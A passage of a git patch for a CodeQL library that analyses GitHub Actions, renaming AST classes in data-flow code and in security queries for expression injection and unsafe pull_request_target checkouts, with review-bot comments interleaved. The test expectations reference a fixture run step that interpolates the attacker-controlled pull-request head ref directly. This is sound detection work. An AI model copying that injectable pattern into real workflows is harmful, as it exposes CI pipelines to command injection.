InputsCtxAccessExpr astTo | + exists(AstNode astFrom, InputsExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -214,10 +215,10 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ matrix.foo }} */ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, MatrixCtxAccessExpr astTo | + exists(AstNode astFrom, MatrixExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } 
@@ -226,12 +227,12 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvCtxAccessExpr astTo | + exists(Expression astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) ) } @@ -266,17 +267,17 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** - * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(CtxAccessExpr access | + exists(ContextExpression access | ( - access instanceof NeedsCtxAccessExpr or - access instanceof StepsCtxAccessExpr or - access instanceof JobsCtxAccessExpr + access instanceof NeedsExpression or + access instanceof StepsExpression or + access instanceof JobsExpression ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and + node1.asExpr() = access.getTarget() and node2.asExpr() = access ) } @@ -294,7 +295,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { - exists(OutputsStmt out, string fieldName | + exists(Outputs out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) 
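Review bot: The QLDoc edited in `ctxFieldReadStep` now reads `Holds if a Expression reads a field ...`; since the predicate binds a `ContextExpression`, make it `Holds if a ContextExpression reads a field from a job (needs/jobs) or step (steps) output via a read of c (fieldname)`. Separately, `inputsCtxLocalStep` and `matrixCtxLocalStep` in the previous hunk widen `astFrom` from `Expression` to `AstNode` while `envCtxLocalStep` here keeps `Expression astFrom`; if `EnvExpression.getTarget()` can yield a non-`Expression` node (the target of an env reference looks like an arbitrary YAML value), those env edges are silently dropped, so either widen it to `AstNode astFrom` as well or add a comment saying why env is different.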
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 5fe3c7417351..a8434cdb6033 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -52,11 +52,11 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input and - input = any(InputsStmt s).getInputExpr(_) + input = any(Inputs s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) } override string toString() { result = "input " + input.toString() } @@ -81,12 +81,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -94,11 +94,11 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputsStmt outputs; + private Outputs outputs; ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflowStmt s).getOutputsStmt() + outputs = any(ReusableWorkflow s).getOutputs() } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c0a694455dc9..fbdf9ca7daa4 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql 
@@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "matrix.yml" + source.getLocation().getFile().getBaseName() = "argus_case_study.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 525307bcc28b..5bff6abc7bb9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index b3eb6d348a85..12703a6cff2d 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql 
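Review bot: `partial.ql` now hardcodes `argus_case_study.yml` as the only file whose sources are explored, and the same literal is pasted into `cfgNodes`/`dfNodes` in `ql/test/library-tests/test.ql` later in this patch. In a checked-in debug query a fixed fixture name is acceptable, but it should be visibly a knob, not a stray value: add a comment above `isSource` such as `// Restrict partial-flow exploration to one workflow file; edit the name to debug another.`, and keep the filter out of the library test, where it changes what the expectations cover.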
@@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) + exists(CompositeAction c | c.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index b451d9d1bda2..e5933a73b36c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 9317b9001581..1e1f942b200d 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
@@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index eeea688b273f..7bcea3d45b02 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + exists(ReusableWorkflow w | w.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 3949488e1298..5ac0c2999295 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql 
@@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index a6baf060c9d8..63f1a7a9d3a3 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -40,8 +40,7 @@ where source .getNode() .asExpr() - .(Statement) - .getEnclosingWorkflowStmt() + .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index c34fcb74bbc0..b13bf88abe64 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index a4cecf18b789..9373bf808e34 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,11 @@ import actions -from WorkflowStmt workflow, JobStmt job +from Workflow workflow, Job job where - job = workflow.getAJobStmt() and + job = workflow.getAJob() and ( - not exists(workflow.getPermissionsStmt()) and - not exists(job.getPermissionsStmt()) + not exists(workflow.getPermissions()) and + not exists(job.getPermissions()) ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 3c951a4e0b0c..34bcbd7b0605 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,10 +21,10 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +from StepUses uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and - uses.getEnclosingWorkflowStmt() = workflow and + uses.getEnclosingWorkflow() = workflow and ( workflow.getName() = name or diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 3c745b5d84aa..ed96d5f07c1b 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql 
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,34 +18,34 @@ import actions /** * An If node that contains an `actor` check */ -class ActorCheckStmt extends IfStmt { - ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +class ActorCheck extends If { + ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } } /** * An If node that contains a `label` check */ -class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { +class LabelCheck extends If { + LabelCheck() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +from Workflow w, Job job, StepUses checkoutStep where w.hasTriggerEvent("pull_request_target") and - w.getAJobStmt() = job and - job.getAStepStmt() = checkoutStep and + w.getAJob() = job and + job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep .getArgumentExpr("ref") - .(ExprAccessExpr) + .(Expression) .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" ]) and - not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and - not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) + not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and + not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4007e6454ea4..ffbbed2bac18 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -90,18 +90,11 @@ stepUsesNodes | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | jobUsesNodes usesSteps -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -runSteps1 +runSteps | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | -runSteps2 -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | runStepChildren | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | 
@@ -115,21 +108,6 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -varAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | -orphanVarAccesses -nonOrphanVarAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -200,6 +178,8 @@ parentNodes | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | cfgNodes +dfNodes +exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | 
@@ -218,44 +198,15 @@ cfgNodes | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -dfNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -exprNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... 
-latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | nodeLocations +| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 168987284c31..7524e31f050b 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -9,49 +9,39 @@ query predicate files(File f) { any() } query predicate yamlNodes(YamlNode n) { any() } -query predicate jobNodes(JobStmt s) { any() } +query predicate jobNodes(Job s) { any() } -query predicate stepNodes(StepStmt s) { any() } +query predicate stepNodes(Step s) { any() } -query predicate allUsesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(Uses s) { any() } -query predicate stepUsesNodes(StepUsesExpr s) { any() } +query predicate stepUsesNodes(StepUses s) { any() } -query predicate jobUsesNodes(JobUsesExpr s) { any() } +query predicate jobUsesNodes(JobUses s) { any() } -query predicate usesSteps(UsesExpr call, string argname, Expression arg) { +query predicate usesSteps(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr } - -query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run } - -query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } - -query predicate orphanVarAccesses(ExprAccessExpr va, string var) { - var = va.getExpression() and - not exists(AstNode n | n = va.getParentNode()) -} - -query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) { - var = va.getExpression() and - parent = va.getParentNode() -} +query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + n.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + 
e.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate exprNodes(DataFlow::ExprNode e) { any() } +query predicate exprNodes(DataFlow::Node e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUses s, string a) { s.getId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } @@ -67,4 +57,4 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } -query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } +query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } From bcf308125912d17d3ab7460191948be90b292f44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 11:17:23 +0100 Subject: [PATCH 082/707] Refactor Input/Outpts --- ql/lib/codeql/actions/Ast.qll | 129 ++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 38 ++---- .../codeql/actions/dataflow/FlowSources.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 11 +- .../dataflow/internal/DataFlowPublic.qll | 11 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- ql/test/library-tests/test.ql | 8 +- 12 files changed, 108 insertions(+), 107 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 881daf133367..cb561fdf8d1c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
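Review bot: `cfgNodes` and `dfNodes` are now filtered to `argus_case_study.yml`, which is not among the files the checked-in expectations exercise (every row in `test.expected` is `.github/workflows/test.yml`), so both query predicates produce empty sections; the leftover `} //any() }` after each shows the filter was a temporary debugging toggle. Restore `query predicate cfgNodes(Cfg::Node n) { any() }` and `query predicate dfNodes(DataFlow::Node e) { any() }` before merging, and keep the file filter in `Debug/partial.ql`. Separately, `exprNodes` now takes `DataFlow::Node` and asserts `any()`, which makes it the unfiltered twin of `dfNodes`, and judging by the expectation diff it now also lists CFG entry/exit nodes; keep the `DataFlow::ExprNode` parameter type there, or rename the predicate to say what it enumerates.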
@@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for thejAST tree. Based on YamlNode from the Yaml library. + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } @@ -23,7 +23,7 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - EnvExpr getEnvExpr(string name) { + Expression getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | @@ -42,9 +42,18 @@ class AstNode instanceof YamlNode { class CompositeAction extends AstNode instanceof Actions::CompositeAction { Runs getRuns() { result = super.getRuns() } - Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name + } } class Runs extends AstNode instanceof Actions::Runs { 
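Review bot: The new `CompositeAction` members `getAnOutputExpr`, `getOutputExpr`, `getAnInput` and `getInput` have no QLDoc, whereas the `Inputs.getInputExpr`/`Outputs.getOutputExpr` they replace were documented; add one-liners such as `/** Gets the input declared under this action's inputs mapping with the given name. */` above `getInput` and the equivalent for the other three. `getInput(string name)` also repeats the full lookup performed by `getAnInput()`; expressing it as `result = this.getAnInput() and result.(YamlString).getValue() = name` keeps the two from drifting apart. The same pattern is repeated in `ReusableWorkflow` in the next hunk.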
